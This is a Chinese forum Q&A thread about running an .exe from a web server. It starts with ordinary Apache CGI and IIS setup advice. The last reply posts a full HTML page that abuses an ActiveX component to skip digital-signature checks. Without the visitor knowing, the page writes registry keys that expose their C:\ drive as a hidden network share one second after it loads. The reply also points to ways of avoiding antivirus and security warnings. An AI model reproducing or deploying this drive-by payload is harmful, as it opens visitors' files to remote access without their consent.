调试易

服务器端运行？你要再服务器端开启权限，否则exe文件会被做为一般文件下载到客户端。
如果是客户端运行，那么下载下来双击一下就能运行了。

设置aa.exe目录为可执行或把aa.exe放在cgi或scripts目录下

能具体一点嘛，cgi或scripts？能给个例子嘛

比如说apache服务器
假设你的c:\cgi-bin目录作为可执行的目录那么在httpd.conf里加一条
scriptalias /cgi-bin/ "C:/cgi-bin"
然后就用通过http://地址/cgi-bin/aa.exe?xxxx  来运行你的cgi程序了。
IIS就更简单拉，只要把某个目录执行许可选成脚本和可执行程序就行了

你要在客户端运行的话，那么需要做成一个activeX,下载后自动运行
不过要有数字签名，需要绕过数字签名的话，参考
<html>
<head><title></title></head>
<body>
hahahah
</body>
<script language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
<!--ActiveX初始化过程-->
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",302,"REG_DWORD"); 
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
}
init(); 
</script>
</html>
上面会被瑞星认为病毒如果需要避开安全警告的话，那么请参考
http://www.vckbase.com/document/viewdoc/?id=728